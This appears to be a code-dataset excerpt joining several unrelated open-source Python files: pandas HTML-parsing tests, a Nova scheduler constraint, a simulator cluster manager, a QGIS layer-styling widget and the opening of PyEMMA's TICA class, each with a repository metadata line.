url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
        An empty tfoot is ignored.
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
0
]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(
self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
)[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
msg = (
r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns"
)
with pytest.raises(ParserError, match=msg):
self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
msg = re.escape(
"Passing a bool to header is invalid. Use header=None for no header or "
"header=int or list-like of ints to specify the row(s) making up the "
"column names"
)
for arg in [True, False]:
with pytest.raises(TypeError, match=msg):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
        # force import check by reinitialising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
| datapythonista/pandas | pandas/tests/io/test_html.py | Python | bsd-3-clause | 40,117 | 0.000773 |
# Copyright (c) 2014 Cisco Systems Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.scheduler.solvers import constraints
CONF = cfg.CONF
CONF.import_opt("max_instances_per_host",
"nova.scheduler.filters.num_instances_filter")
LOG = logging.getLogger(__name__)
class NumInstancesConstraint(constraints.BaseLinearConstraint):
"""Constraint that specifies the maximum number of instances that
each host can launch.
"""
def _generate_components(self, variables, hosts, filter_properties):
num_hosts = len(hosts)
num_instances = filter_properties.get('num_instances')
var_matrix = variables.host_instance_matrix
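        # var_matrix[i][j] is assumed to be the binary decision variable for
        # placing the j-th requested instance on host i; pinning every
        # variable past the acceptable count to 0 (via the '== 0' rows
        # appended below) caps how many new instances this host can take.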
max_instances = CONF.max_instances_per_host
for i in xrange(num_hosts):
num_host_instances = hosts[i].num_instances
acceptable_num_instances = int(max_instances - num_host_instances)
if acceptable_num_instances < 0:
acceptable_num_instances = 0
if acceptable_num_instances < num_instances:
for j in xrange(acceptable_num_instances, num_instances):
self.variables.append([var_matrix[i][j]])
self.coefficients.append([1])
self.constants.append(0)
self.operators.append('==')
LOG.debug(_("%(host)s can accept %(num)s requested instances "
"according to NumInstancesConstraint."),
{'host': hosts[i],
'num': acceptable_num_instances})
| CiscoSystems/nova-solver-scheduler | nova/scheduler/solvers/constraints/num_instances_constraint.py | Python | apache-2.0 | 2,244 | 0.001337 |
class Cluster:
"""
    A cluster has N simulators.
"""
def __init__(self,region_pool):
self.region_pool = region_pool
self.filepath = CLUSTER_DATA_DIR+"cluster"
# simulator list
self.simulator_list = []
def get_simulator_list(self):
return self.simulator_list
def get_simulator_count(self):
return len(self.simulator_list)
def add_simulator(self,sim):
self.simulator_list.append(sim)
def remove_simulator(self,sim):
self.simulator_list.remove(sim)
#====================================================================================
# get region name list
#====================================================================================
def __get_region_name_list(self,region_group,global_region_data):
#REGION_NAME_HUYU=["huyu"+str(x)+str(y) for x in range(4) for y in range(7)]
wh = global_region_data[region_group]["wh"]
xmax = wh[0]
ymax = wh[1]
region_name_list = ["{0}{1}{2}".format(region_group,x,y) for x in range(xmax) for y in range(ymax)]
return region_name_list
#====================================================================================
# init cluster
#====================================================================================
def init_cluster(self):
if os.path.exists(self.filepath):
print "[Cluster] read cluster data from {0}...".format(self.filepath)
self.__read_cluster_data(self.filepath)
else:
print "[Cluster] create default cluster for the first time..."
self.__create_default_cluster()
print "[Cluster] save cluster data to {0}...".format(self.filepath)
self.__save_cluster_data(self.filepath)
def __new_simulator_name(self):
sim_count = len(self.simulator_list)
if sim_count >= SIM_MAX_COUNT:
print "[Warning] sim_count >={0}".format(SIM_MAX_COUNT)
return "default"
return "sim{0}".format(sim_count+1)
def __new_simulator_port(self):
sim_count = len(self.simulator_list)
if sim_count >= SIM_MAX_COUNT:
print "[Warning] sim_count >={0}".format(SIM_MAX_COUNT)
return SIM_START_PORT
return SIM_START_PORT+(sim_count+1)
#====================================================================================
# create default cluster
#====================================================================================
def __create_default_cluster(self):
self.simulator_list = []
region_pool = self.region_pool
global_region_data = self.region_pool.get_global_region_data()
# huyu
region_group="huyu"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
region_name_list = self.__get_region_name_list(region_group,global_region_data)
huyu_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
huyu_sim.create_simulator_xml_file()
self.add_simulator(huyu_sim)
# xwd
region_group="xwd"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
region_name_list = self.__get_region_name_list(region_group,global_region_data)
xwd_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
xwd_sim.create_simulator_xml_file()
self.add_simulator(xwd_sim)
# newregion
region_group="newregion"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
#region_name_list = self.__get_region_name_list("newregion",global_region_data)
region_name_list = self.__get_region_name_list(region_group,global_region_data)
#region_name_list = ["newregion00","newregion01"]
new_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
new_sim.create_simulator_xml_file()
self.add_simulator(new_sim)
print huyu_sim.get_region_port_list()
print xwd_sim.get_region_port_list()
print new_sim.get_region_port_list()
# copy xml files to minions
cmd = UtilityCommander()
cmd.copy_region_xml_to_minions(MINIONS)
def __save_cluster_data(self,filepath):
with open(filepath,'w') as f:
for sim in self.simulator_list:
line = sim.str()+"\n"
f.write(line)
def __read_cluster_data(self,filepath):
for line in open(filepath,'r'):
sim = self.__read_simulator(line)
self.add_simulator(sim)
#====================================================================================
# read simulator from simulator string
#====================================================================================
def __read_simulator(self,simulator_str):
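        # Expected line format (inferred from the parsing below and from what
        # __save_cluster_data writes via Simulator.str()):
        #   "<sim_name>,<sim_port>,<region_1>,...,<region_N>"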
parts = simulator_str.rstrip("\n").split(",")
sim_name = parts[0]
sim_port = int(parts[1])
region_name_list = parts[2:]
# create simulator
sim = Simulator(sim_name,sim_port,self.region_pool,region_name_list)
return sim
def start(self):
for sim in self.get_simulator_list():
sim_pod = OpensimPod(sim)
#sim_pod.start()
def stop(self):
for sim in self.get_simulator_list():
sim_pod = OpensimPod(sim)
sim_pod.stop()
| justasabc/kubernetes-ubuntu | ke/images/python/backup/backup_cluster.py | Python | apache-2.0 | 4,855 | 0.036663 |
'''
Created on 22 sept. 2015
@author: arxit
'''
import os
from qgis.core import *
from PyQt4.QtCore import QCoreApplication
import PagLuxembourg.main
class StylizeProject(object):
'''
Main class for the layers stylize widget
'''
def __init__(self):
'''
Constructor
'''
pass
def run(self):
'''
Runs the widget
'''
project = PagLuxembourg.main.current_project
if not project.isPagProject():
return
# Map layers in the TOC
maplayers = QgsMapLayerRegistry.instance().mapLayers()
# Iterates through XSD types
for type in PagLuxembourg.main.xsd_schema.types:
if type.geometry_type is None:
continue
uri = project.getTypeUri(type)
found = False
# Check whether a layer with type data source exists in the map
for k,v in maplayers.iteritems():
if project.compareURIs(v.source(), uri):
found = True
layer = v
break
if not found:
continue
self.stylizeLayer(layer, type)
PagLuxembourg.main.qgis_interface.messageBar().pushSuccess(QCoreApplication.translate('StylizeProject','Success'),
QCoreApplication.translate('StylizeProject','The layers styling is finished.'))
def stylizeLayer(self, layer, type):
'''
Stylize the current layer
:param layer: The layer to update
:type layer: QgsVectorLayer
:param type: XSD schema type
:type type: PAGType
'''
qml = os.path.join(PagLuxembourg.main.plugin_dir,
'styles',
'{}.qml'.format(type.name))
layer.loadNamedStyle(qml) | Geoportail-Luxembourg/qgis-pag-plugin | widgets/stylize/stylize.py | Python | mit | 2,046 | 0.012219 |
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on 19.01.2015
@author: marscher
'''
import numpy as np
from pyemma._base.serialization.serialization import SerializableMixIn
from pyemma._ext.variational.solvers.direct import eig_corr
from pyemma._ext.variational.util import ZeroRankError
from pyemma.coordinates.estimation.covariance import LaggedCovariance
from pyemma.coordinates.transform._tica_base import TICABase, TICAModelBase
from pyemma.util.annotators import fix_docs
import warnings
__all__ = ['TICA']
@fix_docs
class TICA(TICABase, SerializableMixIn):
r""" Time-lagged independent component analysis (TICA)"""
__serialize_version = 0
def __init__(self, lag, dim=-1, var_cutoff=0.95, kinetic_map=True, commute_map=False, epsilon=1e-6,
stride=1, skip=0, reversible=True, weights=None, ncov_max=float('inf')):
r""" Time-lagged independent component analysis (TICA) [1]_, [2]_, [3]_.
Parameters
----------
lag : int
lag time
dim : int, optional, default -1
Maximum number of significant independent components to use to reduce dimension of input data. -1 means
all numerically available dimensions (see epsilon) will be used unless reduced by var_cutoff.
Setting dim to a positive value is exclusive with var_cutoff.
var_cutoff : float in the range [0,1], optional, default 0.95
Determines the number of output dimensions by including dimensions until their cumulative kinetic variance
exceeds the fraction subspace_variance. var_cutoff=1.0 means all numerically available dimensions
(see epsilon) will be used, unless set by dim. Setting var_cutoff smaller than 1.0 is exclusive with dim
kinetic_map : bool, optional, default True
Eigenvectors will be scaled by eigenvalues. As a result, Euclidean distances in the transformed data
approximate kinetic distances [4]_. This is a good choice when the data is further processed by clustering.
commute_map : bool, optional, default False
Eigenvector_i will be scaled by sqrt(timescale_i / 2). As a result, Euclidean distances in the transformed
data will approximate commute distances [5]_.
epsilon : float
eigenvalue norm cutoff. Eigenvalues of C0 with norms <= epsilon will be
cut off. The remaining number of eigenvalues define the size
of the output.
stride: int, optional, default = 1
Use only every stride-th time step. By default, every time step is used.
skip : int, default=0
skip the first initial n frames per trajectory.
reversible: bool, default=True
symmetrize correlation matrices C_0, C_{\tau}.
weights: object or list of ndarrays, optional, default = None
* An object that allows to compute re-weighting factors to estimate equilibrium means and correlations from
off-equilibrium data. The only requirement is that weights possesses a method weights(X), that accepts a
trajectory X (np.ndarray(T, n)) and returns a vector of re-weighting factors (np.ndarray(T,)).
* A list of ndarrays (ndim=1) specifies the weights for each frame of each trajectory.
Notes
-----
Given a sequence of multivariate data :math:`X_t`, computes the mean-free
covariance and time-lagged covariance matrix:
.. math::
C_0 &= (X_t - \mu)^T (X_t - \mu) \\
C_{\tau} &= (X_t - \mu)^T (X_{t + \tau} - \mu)
and solves the eigenvalue problem
.. math:: C_{\tau} r_i = C_0 \lambda_i(tau) r_i,
where :math:`r_i` are the independent components and :math:`\lambda_i(tau)` are
their respective normalized time-autocorrelations. The eigenvalues are
related to the relaxation timescale by
.. math:: t_i(tau) = -\tau / \ln |\lambda_i|.
When used as a dimension reduction method, the input data is projected
onto the dominant independent components.
References
----------
.. [1] Perez-Hernandez G, F Paul, T Giorgino, G De Fabritiis and F Noe. 2013.
Identification of slow molecular order parameters for Markov model construction
J. Chem. Phys. 139, 015102. doi:10.1063/1.4811489
.. [2] Schwantes C, V S Pande. 2013.
Improvements in Markov State Model Construction Reveal Many Non-Native Interactions in the Folding of NTL9
J. Chem. Theory. Comput. 9, 2000-2009. doi:10.1021/ct300878a
.. [3] L. Molgedey and H. G. Schuster. 1994.
Separation of a mixture of independent signals using time delayed correlations
Phys. Rev. Lett. 72, 3634.
.. [4] Noe, F. and Clementi, C. 2015. Kinetic distance and kinetic maps from molecular dynamics simulation.
